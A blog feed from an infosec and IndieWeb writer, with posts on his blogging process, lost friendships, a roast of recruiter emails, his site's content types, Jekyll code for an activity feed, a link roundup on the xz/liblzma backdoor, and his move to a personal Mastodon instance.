Thu, 09 May 2024 22:30:00 -0400

Blogging is more than just writing. One must come up with ideas, research topics, get words / sentences from brain to keyboard (i.e. “write”), edit + enrich the words themselves and finally publish content out to its destination. Below I break down my process for blogging.

Ideation

Before I can write, I first need an idea of what to write about! So how do I come up with ideas? What are some sources of inspiration? Turns out, I have many!

First, it helps that my site isn’t particularly “niche”. If my blog was strictly infosec content, I would be far more limited in what I could write about. From the beginning, I made sure the theme of my site was scoped broadly, “Infosec, Technology & Life”, effectively giving myself infinite room to write about anything I wanted.

Work, i.e. my professional life, is a great source of ideas and content. If i’m working on something at my job, or learning something new, there’s no reason I shouldn’t write about it! Doing so helps reinforce what I am doing such that I’m more effective on the job and also helps me create a resource for myself and others later. (Note: Just be sure to keep what you write about is environment/company-agnostic so you don’t get in any trouble.)

Social media is a great source of ideas. There are lots of conversations and other pieces published by bloggers to take inspiration from. There is a trend of one blogger posting something like “Thoughts on Chips”, and then others writing a response post where they too write about that same subject. So using the collective idea pool of those you follow and by extension, who they follow, is a great way to come up with ideas. Similarly, people tend to ask a lot of questions on social media. Answering a question via a blog post is a great way to write, help someone/the community and also market your site.

The act of blogging and maintaining a site has also been, for me, a wellspring of new things to write about. Turns out when you research and write, you come up with more and more ideas!

If all else fails, pull ideas from your life. If you have a good recipe, document it! Saw a good movie? Review it! Like your car? Write about it. Anything and everything in your life can be written about. Don’t worry about whether it will be “interesting” to others. If it interests you, I guarantee it will interest someone else. In fact, in the past I’ve written about a number of things not to worry about when writing/blogging and I think it is still great advice.

Research

I don’t have a specific, or particulary well-thought-out research methodology. There are posts that I spend a long time writing and researching and many that I do effectively no research on. For the latter, I write it completely off the cuff and ship it. The “technical” posts tend to be ones that are more link and research-heavy, while posts about things in my life are often written as single trains of thought. Remember! If you’re posting something on a site you own, you can always edit posts after they are initially published. Nothing is set in stone. So don’t let perfection be the enemy of just getting something written and published to the world.

Writing

So how do I write? I tend to start by just dumping as much as I can think of as lists, relevant links, sections and other raw ideas / thoughts into the doc. From there, I start figuring out the rough framing/skeleton (i.e. sections) of the post will be. Once I know generally the sections I want to write and their order, I just start at the beginning, write the intro and then move on to each successive section. For longer posts, I tend to jump back and forth between writing and editing/enrichment after each section. I find that my writing “style” is very conversational, and probably riddled with syntactic errors.

Editing + Enrichment

The most time-consuming part of my blogging process is editing & enrichment, notably the enrichment part. I tend to read through each section a number of times, each time looking to improve a different aspect…

Flow & wording: This is the first thing I attempt to fix, paragraph-by-paragraph. I try to make sure what I’ve said makes sense, flows together and the words themselves are of quality and non-repetitive.
Spelling & grammar: Next, a classic spelling & grammar run-through.
Links: For those of you that are familiar with my writing portfolio, you know that I love to link to things - within the post jumping to sections, in other posts on my site and to external content. I link everything and everywhere.
Supplementary information: Sometimes I find that a paragraph or section doesn’t completely convey what I wanted to say or it alone isn’t enough information for my intended audience. I tend to like to write to an audience who is more “beginner”, which means giving more background and context. So, if I find more info is needed, I will either write additional paragraphs for a respective section, or add appendices as needed. In many cases, I will just link to relevant content that I’ve written elsewhere on the site.
Graphics: A simple pass-through - would the section benefit from a graphic? If so, I make it and drop it in.
References: For longer posts (and those which required some “research”), I like to have thorough citations/references at the bottom. This requires superscripting throughout each section and having relevant, numbered links in an appendix at the bottom.
Other stuff: This final pass-through is where I tend to fix things like my accursed habit of using “it’s” when I should be using “its”, among other things.

Publishing

You can read more about my syndication strategy.

There ya have it! That’s how I blog.

An Ode to Lost Friends

Mon, 06 May 2024 09:11:00 -0400

They say time heals all, but time is also a void that severs and decays the bonds of friendship. With fondness and regret, I look back at a life dotted with friendships made, and those forgotten…

Thanks to Apis Necros for inspiring me with their own original post on this subject.

“Veronica”

In elementary school (I forget which grade exactly), we used to play kickball before class. One day, I got pegged in the face with the ball. It knocked the glasses off my face into the dirt and my nose bled. I cried and the kids laughed. “Veronica” (Her name definitely started with a “V”, but it could have been something else) instead picked up my glasses and asked me if I was OK. We weren’t ever friends, either before or after that day, but I’ll always remember how she was nice to me in that moment.

The “Boys in Black”

Way back in 4th/5th grade there was a group of maybe 3 of us who called ourselves the “Boys in Black”, i.e. “BiB” (inspired by the “Men in Black” movie). I don’t remember how we came up with this, or to what extent any one of us loved that movie so much that we’d name our group after it, but yeah. It’s funny too because thinking back, wearing black was not part of what we did at all. We would hold (daily?) meetings in class to discuss something, but mostly we spent our time doodling “bases” and fantastical weaponry / vehicles-of-war (e.g. jeeps, tanks, etc…). I suppose we liked (as many young boys/children probably do) the idea of having a secret base filled with cool gadgets and lasers. In that group, was another kid whos name I don’t remember, but I do recall that his birthday was the day after mine. We used to observe that my birthday was the final day of Winter and his the first of Spring. That meant something to us. To the BiB!

Leanna

My family and hers were incredibly close growing up, even into the later years of our childhood (i.e. highschool). We went on family trips, went camping, I even went to some highschool dances with her. Our parents would joke about us dating but we were always just friends. I still have vague memories of going to her family’s townhouse (in Lakeridge?) and hanging out in the basement with their dog Zelda and her two sisters (Victoria and Alexandra). In what is somewhat of a small-world-style twist, she ended up getting married to another past friend of mine from a separate circle (James, who I knew from Boy Scouts). I still think about the two of them and her family from time to time. I could probably reach out, but I never do. I hope they’re all doing great!

Amy

Amy was, for a time, my best friend. In the days before the Internet took off, or cell phones were a thing, we would talk for HOURS on the phone, about anything, about whatever teenage kids in the 00’s had to talk about. One day, it just faded away and we stopped talking. I still don’t know why.

Galileo

Zak, Aaron, Johnson, Sean, my fellow 7th floor Galileo engineers at VT. For the better part of 4 years they were my friends, classmates and those I spent my days with. We had some good times and I suppose some not as good times. I sadly don’t talk to them anymore. I’ve seen some occasional things on LinkedIn, in the days I bothered to go on LinkedIn and see what they were up to. It would be cool to catch up one day, see where their lives had taken them, meet their families, their kids. Ya never know…

Kenny

For nearly 5 years me and Kenny sat next to each other and did our best to stay busy. We worked at a large, well-known defense contractor. We were work friends and even had the rare meetup outside of work. Most memorable to me though is the weeks we spent painting/coloring/decorating these little troll figurines to look like various Marvel/DC super heros. Silly times.

Destiny 1, Raid Crew

Oh man did I love playing Destiny back in the day. I was a big time Halo addict back in the Halo 2/3 days and Destiny was no different. I played a lot of PVP via matchmaking but I also did a lot of raids (VoG anyone?) with a specific crew. We got along great and I remember they thought I was pretty funny. One day I just stopped playing and that was the end of an era.

Destiny 2, Stadia & the Salvations Clan

Years after D1, Destiny 2 came to Stadia and I got really into the franchise once more. I played on “Stadia”, Google’s game streaming platform and it was a really great experience, and also a very small (relatively speaking) community. We all seemed to generally know each other and get along, chatting amongst ourselves across a few Discord servers and Reddit subs. Eventually I joined the “Salvations” clan with my brother, someone who went by “Politics” (who was very good) and a number of others. I also played with someone named “Time” who was very good with the bow. My “Arbalest” skills were legendary amongst the Stadia crew and boy did I have fun playing. Eventually life, family and other priorities became too much for me to afford the time needed to keep up with the game though. So much like what happened with D1, I pretty much vanished one day (and eventually Stadia too met its end.)

Pickup Ballers

Over the years I’ve ran pickup bball with a number of different groups of guys. In each era, I’d play several times a week, for several hours each day. We came to know each other by name and we knew each others style of play. When I moved, or switched gyms, there were never any goodbyes. I just stopped going one day. In rare cases I would run into someone at wherever my new place that I would play, but generally, I just never saw them again. Another example, in a long string of examples of very situational friendships.

Shoutout to the Courtland Towers crew - Paul, Leo, Eric, Steve K, Steve J, Derek and others whos names escape me.

My stories aren’t particularly unique. Everyone has similar tales of friendships made and lost. It is just the nature of our shared experience as humans. I will admit that I am particularly bad at keeping in touch and surely what could have been longer-lasting relationships have suffered because of it. I also have a notoriously bad memory in terms of remembering anything from more than like 5 years ago, so there are likely countless other meaningful friendships that have been completely lost, even in memory. For those in my past, mentioned or not mentioned here that ever wanted to reach out, do it!

HIRING::::URGENT!::SECURITYSPECIALIST:::REMOTE

Fri, 03 May 2024 08:59:00 -0400

If you are in the tech space, you are probably accustomed to the daily barrage of poorly formatted and eye-gougingly styled job emails from tiny recruitment shops. What is up with those? Why are they so bad?

Take for example, what you see below…

OK, yeah… wow. Rough on the eyes right? To be transparent, this is NOT an actual email I’ve received, it is instead something I crafted where every bizarre formatting, style and language choice was taken directly from, or heavily inspired by, an email I have received in literally the past 3 days or so. I’ve just decided to mush all of these oddities into a single email for comedic effect. So let’s go ahead and roast it a bit…

Too often they’re either not bothered to address the email to me, get my name wrong or have something generic like “CANDIDATE”.
Weird ellipses in places they’re not called for.
2+ exclamation points in random places.
Things are just highlighted at random, often with different colors throughout. Oh and the dark mode version of these emails is even MORE illegible.
Multiple font types, font sizes, line spacing, font weights, you name it…
Crazy amount of white space inbetween sections.
Plenty of language follies. (I really mean no offense here to non-native English speakers. I understand the difficulty of learning a second language, but in a setting where you are catering to an english-speaking candidate pool, getting this right could go a long way in making these emails seem more legitimate & professional)
- “I came to you regarding one of my job position”
- “We are looking for Engineer Please review below job description”
- “If you are interested then please share me your resume”
Text is tabbed out in random ways.
Table like formatting with incredibly inconsistent margins.
“Remote” roles that are also onsite?
Scary bolded red lines for VISA requirements.
Section headers are inconsistently styled.
Lists with bullets, lists without bullets, lists with two different kinds of bullets, blank list items.
Whatever this is –> “??????Required????5?????Years”, at the end of list items.
and ya gotta love those signature blocks.

I don’t want this “roast” to come off as mean-spirited. Having actually worked with some of the folks behind these emails, I can assure you that they are in many cases, real people, real recruiters, recruiting for real jobs at real companies. They are, like the rest of us, trying to make a go of this crazy world.

But! It’s wild to me that these emails get crafted, whether by hand or by some cursed automation somewhere and then sent, likely en-masse, to people like myself in the hopes that we’ll be encouraged to respond. I suppose if you’re out-of-work or dangerously curious (as I often am) you’re willing to entertain even the wackiest of job propositions. These just straight-up don’t pass the eye test though. Since I know for a fact that there is some subset of these emails that are legitimate, they must be interested in improving their response rate for potential candidates right? As such, it wouldn’t take much to clean these up and make them A LOT more palatable. So why do they continue to look like this? Is no one helping them? Do they have individuals who work at these companies who actually look at these emails, then just nod and say “looks good to me!”?

So here’s my plea to these recruiting agencies. Pick a font. ONE FONT. Pick a font size. No highlighting. Easy on the white space. Stop capitalizing things at random. Simple sections with bulleted lists is fine! Proofread, just a little. Make sure you get my name right, or a simple - NORMAL! - greeting is fine (e.g. “Hello”). I promise this will improve take rate, and spare my eyes a bit in the process.

Thanks for reading!

A Multiplicity of Writing

Tue, 09 Apr 2024 15:38:00 -0400

On this site, I write and publish in a variety of different forms. Here I describe what these different content types are and how / why I use them across the site. Multiple different post ‘types’ is an important characteristic of an IndieWeb site. Elsewhere, I cover my approach to syndication (i.e. POSSE / PESOS), wherein I describe my methodology for sharing and canonicalizing content across the web.

Content Types

My writing here is published in a variety of different formats. A list of these formats is provided below.

Notes
Captain Logs
Posts
Podcasts
Devlogs
Links
Scrolls
Other Pages

All of this content is (for the most part) aggregated and displayed chronologically in the Activity feed. You can subscribe to most everything here via RSS feeds.

Notes

Notes are an IndieWeb concept for short-form posts, typically sourced from, or syndicated-to, micro-blogging platforms such as Mastodon or Threads. I use notes in the following ways…

A repository for reverse-syndicated social media (microblog) posts (i.e. Mastodon)
Other types of short-form content (typically <1000 characters)

So when does a social media post qualify as something I want to archive on my site as a note? To be honest, it’s somewhat subjective and there is no clear methodology. If I think it is something that I tend to repeat, I will likely try to capture it so I can just share a link to the note in the future. If it is something that becomes noteworthy from a virality or engagement perspective (i.e. receives a lot of comments, boosts, likes), I might capture it as a note. For responses that would require >500 characters, I may capture it as a note and then link to it in my social media reply. There is a conscious decision to NOT capture EVERY public post/reply as a note on my site as that would be, A. cumbersome and, B. of little future value. My site is as much, if not more, a reference for me as it is a place where others can read my writing. As such, memorializing everything I post out on the web is just not useful to index.

Notes tend to be my most-used content type and a place where I feel a bit more uninhibited in terms of what I write about. As an example, in my NaBloPoMo 2023 series, I captured most of my writing as notes, and the subjects I wrote about were as a majority, non-tech and non-infosec. In this way, I can avoid cluttering my longer-form, traditional blog post feed.

Notes live in the “Notebook”, which I’ve styled to look much like a social micro-blogging feed/timeline. Each individual perma-linked note has also been styled to look like a social media post complete with avatar, @ handle, etc…

I’ve even devised a way to display social-media-post-style “cards” inline throughout my site. One such card is shown below.

Mike Sass
@shellsharks

11/17/22 08:11

“If you find yourself alone, riding in green fields with the sun on your face, do not be troubled. For you are on Mastodon, and not on Twitter!” - Mastodonius Decimus Meridius

#Gladiator is the best movie of all time. I can’t be convinced otherwise.

Metatext

Syndication:

#life #movies

Captain Logs

The Captain’s Log is essentially a personal journal/diary. It is very informal and covers a range of more personal topics such as what I’m learning, gadgets, fitness, TV/movies, gaming, investing, parenthood, traveling, and life in general. I also tend to have other Shellsharks community/site meta-commentary. Some of these topics are captured in the more ephemeral /Now page, but the logs themselves serve kinda as /then views (a /then is an idea for archiving /now pages at specific points in time). Captain’s log entries are typically published monthly as digests without too much structure beyond some sections and bulleted lists.

These logs allow me to revisit previous months of my life to remember what I was up to. For anyone out there who wants to get a little more personal perspective on me—that’s what this can do. I’ve been journaling in this way since March 2021!

Log entries are somewhat boringly displayed in a bulleted list on the main /captains-log page.

Posts

Posts are traditional, long-form content. Much like notes, topics can include pretty much anything (i.e. Infosec, Technology, Life), but they tend to be more structured and well-researched.

I find myself waffling sometimes on whether something I publish should be a note or a post and I’m sure I’ve “noted” things that honestly should have been “posted”.

Podcasts

Podcasts are pretty self-explanatory. For now, all podcast episodes are captured on the site on a single page in a bulleted list.

NOTE: The Shellsharks Podcast is on an indefinite hiatus. An archive of the episodes is likely still available on Apple Podcasts and Spotify. My podcast hosting service is now defunct and I am looking to stand up Castopod again somewhere else. Stay tuned!

Devlogs

Devlogs are where I write about my journey working on and developing this site, as well as any other shellsharks-related properties (e.g. podcast, Fediverse instance, etc…). I felt Devlogs need a separate, isolated space as the audience for this particular type of content is somewhat niche (e.g. IndieWeb fans, hobbyists, other bloggers, etc…). They will also serve as a useful reference for myself as I often forget how/why I did something on my site. I am notoriously bad at saving useful articles, documenting my site and leaving comments within my code. [*]

Links

Links, shared via the Linklog, are a simple way for me to share links to articles/sites that I think are cool. I’ve seen other indie sites do this and I love the idea of making my site more social and interconnected, while also promoting good stuff I discover as I surf the wider Internet.

Scrolls

Scrolls is a weekly newsletter / link roundup / information digest at the intersection of the IndieWeb and the Fediverse, with a splash of Cybersecurity stuff. It is published on the web on a weekly-ish cadence, completely free. Check out the latest edition and get scrollin’!

Other Pages

Here’s some other things I share on this site…

Changes: A loooong list of minute changes to the site, sectioned daily.
/Uses: Stuff that I use.
/Ideas: Ideas that I have.
/Now: What I’m up to now.
Blogroll: Blogs/sites I enjoy.
>Shark Week: A once-a-year, week-long stream of content from your favorite mildly-shark-themed infosec / tech / everything blog, coinciding with actual shark week.

There’s more to discover beyond all of this too! I suggest perusing the hamburger menu on my site to start. 🍔

Creating an Activity Feed with Jekyll

Tue, 09 Apr 2024 13:32:00 -0400

In my effort to IndieWeb-ify my site, I’ve created a unified Activity feed which aggregates traditional posts, notes, captain logs, changes (and more in the future) into a single, chronological timeline. [1]

I’d like to thank the following individuals for helping inspire my Activity feed!

OK, so how did I make this using Jekyll? The first version of the Activity feed relies heavily on leveraging the Jekyll concept of “Collections”. Future versions of this feed may pull in content from additional places around the site & beyond using other mechanisms.

First, I needed to get all of my various collections (i.e. notes, logs, posts, etc…) into a single array. The code below uses concat to do just this. site[collection.label] translates to site.notes, site.posts, etc…

{% for collection in site.collections %}
  {% assign content_array = content_array | concat: site[collection.label] %}
{% endfor %}

Following this, I needed to chronologically sort the aggregate array.

{% assign content_array = content_array | sort: "date" | reverse %}

To handle different styling for different content types, I created an If/Else structure which iterates through the chronologically sorted content array setting some different variables for each type of content. For example, for records in the Activity feed that are “notes”, they will have a different icon, different “verb” and different way to express the inline content summary. It determines content type by looking at the collection value for each item in the content array.

{% assign post_type = "" %}

{% for item in content_array %}
  
  {% assign post_type = item.collection %}
  {% if post_type == "notes" %}
    {% assign icon = "ph ph-note" %}
    {% assign verb = "Noted" %}
    {% assign content = item.excerpt | strip_html | strip_newlines | truncatewords: 50 %}
  {% elsif post_type == "captain_logs" %}
    {% assign icon = "ph ph-notebook" %}
    {% assign verb = "Logged" %}
    {% assign content = item.excerpt | strip_html | strip_newlines | truncatewords: 50 %}
  {% elsif post_type == "posts" %}
    {% assign icon = "ph ph-article" %}
    {% assign verb = "Posted" %}
    {% assign content = item.description %}
  {% else %}
     {% assign icon = "ph ph-chat-text" %}
     {% assign verb = "Shared" %}
  {% endif %}

Finally, I need to create the structure for each record in the Activity feed. The code snippet below demonstrates this div which houses some inline styling info for per-content-type aesthetics, Liquid syntax for pulling content record-specific URL, title, description, publish date, etc…

  <div class="item" style="border-color: var(--{{item.collection}}-color); background-color: color-mix(in srgb, var(--{{item.collection}}-color) 7%, var(--background-color));">
  <span class="verb"><i class="{{ icon }}"></i> {{ verb }}:</span>
  <h3><a href="{{ item.url }}">{{ item.title }}</a></h3>
  <div>{{ content }}</div>
  <span class="date"><i>published</i> {{ item.date | date: '%B %e, %Y' }}</span><span class="syndicate">{% if item.syndicate-to %}<i class="ph ph-broadcast" title="Syndication"></i> {% for dest in item.syndicate-to %}{% if dest.url %}<span style="padding:0px 5px 0px 5px;"><a href="{{dest.url}}">{% if dest.icon %}<i class="{{dest.icon}}" title="{{dest.name}}"></i>{% else %}<i class="ph ph-share-network" title="{{dest.name}}"></i>{% endif %}</a></span>{% endif %}{% endfor %}{% endif %}</span>
  {% if item.tags %}<div class="tags">{% for tag in item.tags %}<span>#{{tag}}</span> {% endfor %}</div>{% endif %}
  </div>

NOTE: Not described here is some of the more unique on-page CSS styling and the (very similar) div block I created to pull in the latest Changelog list.

Future Versions

I have some ideas for what other types of content I may pull into this feed in the future…

I’d like to introduce a new type of content, a “devlog” - featuring specific writeups on exactly how I make changes to this site.
Podcasts: I need to convert my podcast entries into a collection format. Oh and get Podcasting again!
I’m toying with the idea of converting my gargantuan changelog page into a per-day or per-week collection format.
Bringing in /Now (or /Then) content. [2]
Reverse syndication of other posts around the web (i.e. Mastodon, Reddit, Bluesky, etc…) directly into the feed.

Code Appendix

A full pasting of the code below…

{% for collection in site.collections %}
  {% assign content_array = content_array | concat: site[collection.label] %}
{% endfor %}

{% assign content_array = content_array | sort: "date" | reverse %}

{% assign post_type = "" %}

{% for item in content_array %}
  
  {% assign post_type = item.collection %}
  {% if post_type == "notes" %}
    {% assign icon = "ph ph-note" %}
    {% assign verb = "Noted" %}
    {% assign content = item.excerpt | strip_html | strip_newlines | truncatewords: 50 %}
  {% elsif post_type == "captain_logs" %}
    {% assign icon = "ph ph-notebook" %}
    {% assign verb = "Logged" %}
    {% assign content = item.excerpt | strip_html | strip_newlines | truncatewords: 50 %}
  {% elsif post_type == "posts" %}
    {% assign icon = "ph ph-article" %}
    {% assign verb = "Posted" %}
    {% assign content = item.description %}
  {% else %}
     {% assign icon = "ph ph-chat-text" %}
     {% assign verb = "Shared" %}
  {% endif %}

  <div class="item" style="border-color: var(--{{item.collection}}-color); background-color: color-mix(in srgb, var(--{{item.collection}}-color) 7%, var(--background-color));">
  <span class="verb"><i class="{{ icon }}"></i> {{ verb }}:</span>
  <h3><a href="{{ item.url }}">{{ item.title }}</a></h3>
  <div>{{ content }}</div>
  <span class="date"><i>published</i> {{ item.date | date: '%B %e, %Y' }}</span><span class="syndicate">{% if item.syndicate-to %}<i class="ph ph-broadcast" title="Syndication"></i> {% for dest in item.syndicate-to %}{% if dest.url %}<span style="padding:0px 5px 0px 5px;"><a href="{{dest.url}}">{% if dest.icon %}<i class="{{dest.icon}}" title="{{dest.name}}"></i>{% else %}<i class="ph ph-share-network" title="{{dest.name}}"></i>{% endif %}</a></span>{% endif %}{% endfor %}{% endif %}</span>
  {% if item.tags %}<div class="tags">{% for tag in item.tags %}<span>#{{tag}}</span> {% endfor %}</div>{% endif %}
  </div>
{% endfor %}

xz/liblzma Compromise Link Roundup

Sun, 31 Mar 2024 00:21:00 -0400

The infosec/technology world is abuzz with discussions and analyses pertaining to the recently identified compromise of the open-source xz/liblzma compression library, i.e. CVE-2024-3094. Here is a roundup of links related to everything going on…

TL;DR

Explanations

Key links to get you up to speed on what is going on.

The original alert to the compromise - backdoor in upsstream xz/liblzma leading to ssh server compromise | Openwall (per Andres Freund)
Notice from the original maintainer - XZ Utils backdoor | tukaani.org

Two of the best explanatory writeups…

Other Explanations

Technical Analyses

Analysis from those on the ground investigating, reverse engineering and hunting…

Reversing the xz backdoor (per Filippo Valsorda, bsky | Openwall)
xz/liblzma: Bash-stage Obfuscation Explained by Gynvael Coldwind
Writeup on xz backdoor by @js@nil.im
Fix sabotaged Landlock sandbox check (per @danderson@hachyderm.io)
Timeline of the xz open source attack (per @rsc@hachyderm.io)
The xz attack shell script
XZ Backdoor Analysis | smx-smx
xz: Disable ifunc to fix issue - Convincing Google fuzzing project not to run against xz via social engineering (per @megmac@treehouse.systems)
2021 “risky change” by JiaT75” - Added error text to warning when untaring with bsdtar (per @GossiTheDog@cyberplace.social)
Sock puppets pressuring the maintainer (per @vegard@mastodon.social)
liblzma backdoor strings extracted from 5.6.1
killswitch to xz backdoor (per @zeno@piaille.fr)
Reduce dependencies of libsystemd (per @GossiTheDog@cyberplace.social)
Threat Brief: Vulnerability in XZ Utils Data Compression Library Impacting Multiple Linux Distributions (CVE-2024-3094) from Palo Alto Unit42 (per @simontsui@infosec.exchange)
Visualizing dependency graphs on a Linux distribution (per @nopatience@swecyb.com)
xz vulnerable honeypot (per @ollie_whitehouse@infosec.exchange)
xz_cve-2024-3094-detect.sh (per @wdormann@infosec.exchange)
chainguard-dev/bincapz (per @thomrstrom@triangletoot.party)
XZ Utils web archive
xz-utils backdoor: how to get started | Kali
xz bot (per @amlw@infosec.exchange)
SANS Internet Storm Center analysis
Code Review by Security Based (per @rx13@infosec.exchange)
Finding similar compromises | Openwall
XZ for Java | Lasse Collin
Putting an xz Backdoor Payload in a Valid RSA Key

Single-page analysis graphic from @fr0gger@infosec.exchange

Discussion

Thoughts from around the web…

A Microcosm of the interactions in Open Source projects | Rob Mensching (per @swelljoe@mas.to)
Discussion thread from Kevin Beaumont
Discussion thread from Will Dormann
@rugk@chaos.social on leveraging SLSA
@harrysintonen@infosec.exchange with topics to consider/discuss/ponder
@rene_mobile@infosec.exchange discussion points
the XZ Fiasco by @cmdr_nova@mkultra.monster
CVE-2024-3094 trends on CveCrowd per @kpwn@infosec.exchange
why supply chain safeguards would have been ineffective (per @yossarian@infosec.exchange)
@Jerry@infosec.exchange on how xz increased traffic graph for infosec.exchange
Resources for responding to CVE-2024-3094 | Threatview.io (per @Malwar3Ninja@infosec.exchange)
Observations from @UK_Daniel_Card / mRr3b00t (via @ravirockks@infosec.exchange)
Two names that are mentioned related to backdoor (per @briankrebs@infosec.exchange)
Reconsider reusing upstream tarballs (per @solene@bsd.network)
Hacker News discussion
Open Source Security | XZ Bonus Spectacular Episode
Discussion from @tinker@infosec.exchange
Organization costs of the xz backdoor (per @some_natalie@infosec.exchange)
Towards reproducible minimal source code tarballs? On *-src.tar.gz
Thoughts from Brian Krebs
xz, Tidelift, and paying the maintainers (per @luis_in_brief@social.coop)
Infosec Decoded Podcast
Risk Business #743 - A chat with @AndresFreundTec
OSQI Open Source Quality Institutes (per @timbray@cosocial.ca)
XZ Backdoor: Not the End of Open Source | Tales about Software Engineering (per @beny23@infosec.exchange)
Bullying in Open Source Software Is a Massive Security Vulnerability | 404 Media
The xz Issue Isn’t About Open Source
xz incident shows the need for structural change | Sovereign Tech Fund
Thoughts on the xz backdoor: an lzma-rs perspective
OpenSSF Alert for Social Engineering Takeovers of Open Source Projects
Establish Trust And Do No Harm

Vendor Notices

* thanks @techsaviours@fosstodon.org & @dfncert@infosec.exchange

Other General Reporting

TL;DR

If you want to really know what’s going on, I would defer to the much better explanations I’ve linked to above. However, if you want a quick readout, here’s what I’d say…

There was a supply-chain compromise in a very widely used compression library (xz/liblzma). The compromise was (very luckily) detected early which mitigated the risk of the introduced vulnerability. The vulnerability notably manifests in OpenSSH, the risk (if unpatched) appears to be full RCE of affected SSH servers. The attack chain used to infiltrate the package repo and stealthily insert the backdoor is reminiscent of state-sponsored actors. No other attempts at attribution have been made to my knowledge. Investigations into the malicious code are on-going. Vendors have released notices and it is advised to check what version you are running and upgrade/downgrade as necessary.

Humor

Even in times like these, sometimes you gotta laugh.

A lot of people riffed off of xkcd 2347 (1, 2, 3, 4)…

Others let us know they were ok… and another

It’s crazy how Andres even detected it…

A pastry chef to OSS analogy…

The CTF of the decade…

Some other comics…

Branding

Some attempts to name CVE-2024-3094…

Credit

Thanks to all these folks for their contributions.

@megmac@treehouse.systems @zeno@piaille.fr @rugk@chaos.social @harrysintonen@infosec.exchange @landley@mstdn.jp @techsaviours@fosstodon.org @rene_mobile@infosec.exchange @himazawa@infosec.exchange @GossiTheDog@cyberplace.social @js@nil.im @gynvael@infosec.exchange @cmdr_nova@mkultra.monster @kpwn@infosec.exchange @SteveBellovin@mastodon.lawprofs.org @vegard@mastodon.social @yossarian@infosec.exchange @Jerry@infosec.exchange @danderson@hachyderm.io @AndresFreundTec@mastodon.social @swelljoe@mas.to @filippo@abyssdomain.expert @lcamtuf@infosec.exchange @eb@social.coop @claudiom@social.sdf.org @Malwar3Ninja@infosec.exchange @simontsui@infosec.exchange @wdormann@infosec.exchange @ravirockks@infosec.exchange @nopatience@swecyb.com @fr0gger@infosec.exchange @ollie_whitehouse@infosec.exchange @briankrebs@infosec.exchange @thomrstrom@triangletoot.party @solene@bsd.network @amlw@infosec.exchange @rsc@hachyderm.io @luis_in_brief@social.coop

and a big THANKS to Andres Freund for his heroic efforts!

Send Love to Lasse

Owning My Own Social

Thu, 28 Mar 2024 00:17:00 -0400

As of March 24, 2024, I *socially* operate out of a single-user¹ / personal Mastodon instance — shellsharks.social. But how did I get here?

Like many other people who find themselves at least mildly online (or chronically so, as I do), I am a frequent user of (a variety of) social media platforms. When Twitter fell, the world of social micro-blogging fractured, with people fleeing across the Internet to a number of platforms, both new and old. For my part, I took up residence on Mastodon, specifically, a cybersecurity-themed instance — infosec.exchange. (I also reanimated my long dormant mastodon.social account.)

Infosec.exchange was perfect for what I was looking for at the time. I used Twitter mostly as a place to follow others in the infosec/tech industry and infosec.exchange was the choice landing spot for many other disaffected infosec-Twitter refugees. There I re-found my people but also became a more active member of the community—sharing posts, interacting with others, etc…

After nearly two years on infosec.exchange (and on Mastodon more generally), I acquired an appreciation for the possibilities the Fediverse afforded and in that time also first discovered the IndieWeb. Moving to shellsharks.social is a direct result of the confluence of these newfound interests — the Fediverse & the IndieWeb.

[1] shellsharks.social is not exactly single-account, but it is “single-user” (just me)

IndieSocial

What if we were to combine the social aspects of the Fediverse with the autonomy and personality of the IndieWeb?

My foray into the IndieWeb has been a great success. I’ve leaned into its ideals as much as is technologically (and philosophically) feasible for my statically-generated site. But where it excels at hosting my content and being a centralized, permanent place for my identity* & content on the web, it falls short in its ability to truly connect me with others in the way a traditional social media platform can. My latest stint on Mastodon / infosec.exchange succeeded in connecting me with others who value what I have to share on my site, but my identity being tied to a handle on infosec.exchange was limiting in that I ultimately did not own my posts, nor my branding, and though I do mostly post about infosec stuff, it had a quasi-pigeon-holing effect due to the instance moniker itself (infosec.exchange). I would often see people on Mastodon responding from unique, single-user instances that served as a badge of authenticity and I coveted that. And though no one on the Fediverse could ask for a more thoughtful and capable server owner than those on infosec.exchange, I always wondered would would/could happen if/when Jerry decided to hang it up. More and more I started to think that I needed to replicate what I had done with my website, but with my social platform — I needed to own my own social. Only then could I begin to post uninhibited by expectation, allowing myself to be uniquely me. But there’s more than simple vanity on the line when it comes to a personal Fedi instance!

* Two big inspirations for me with regard to the IndieWeb and a web-based identity are Joan Westenberg and Cory Dransfeldt.

Benefits of a Personal Fediverse Instance

Beyond the intrinsic benefits of Mastodon (and the Fediverse at large), there are a lot of benefits to running your own Fediverse instance.

A more perpetual, authentic (social) identity on the web.
Vanity Fediverse handle (e.g. “@shellsharks@shellsharks.social”)
Branding: For individual creators and business, having a social identity hosted on a domain which has personalized branding can be very important.
Deplatforming resistance: Since you are the instance admin, you can not be deplatformed. Only your ISP or hosting provider could effectively do this and this is quite rare.
Mitigate localized censorship: On a community instance, admins and moderators can censor your posts.
Data ownership: As an admin, you have control over data exports and lifecycle.
Customization: Instance admins can customize the CSS of their site, relays, emojis, trending, etc…
Spontaneous server death: Instances have died in the past due to database corruption, domain seizure, admin burnout, lack of funding and more. Avoid this by running your own instance.
Defederation control: Though users on a community instance have a lot of power in self-moderation, some controls for isolation and defederation are only available at the administrative level.

Hosting: Challenges, Choices & Chronology

OK, so I knew I wanted to “own my own social”, and for me, this meant having my own Fediverse server of some flavor (e.g. Mastodon, Akkoma, IceShrimp, GoToSocial, etc…). Because of my affinity for the iOS client Ivory, I decided Mastodon would be the best fit (Ivory only works with Mastodon at this time). From my research I knew Mastodon to be on the trickier & more resource-hungry side of the Fediverse platform spectrum. In terms of hosting, I first had to decide between managed or self-hosted.

Masto.host was one managed Mastodon-hosting platform that I heard a lot about and seemed quite reliable so I decided to put a small alt account (@afterdark) there on an instance “shellsharks.social” to test it out. The base tier (“Moon”) was very slow and even with only a single-user with <30 followers and only 1 follow it was achingly ill-performant. I wasn’t terribly impressed but knew by sizing up a tier or two it would likely be better.

The ideal situation of course would be to gloriously self-host and administer the entire stack. I learned a few things from having put together some resources on Mastodon instance administration and following along over the last year or so as other instance admins grew their communities. I had some understanding of the architecture of Mastodon, I knew some pitfalls of ActivityPub-based federation and I knew Hetzner was a popular hosting provider to get a cheap, reliable VPS. So with all that, I just went for it.

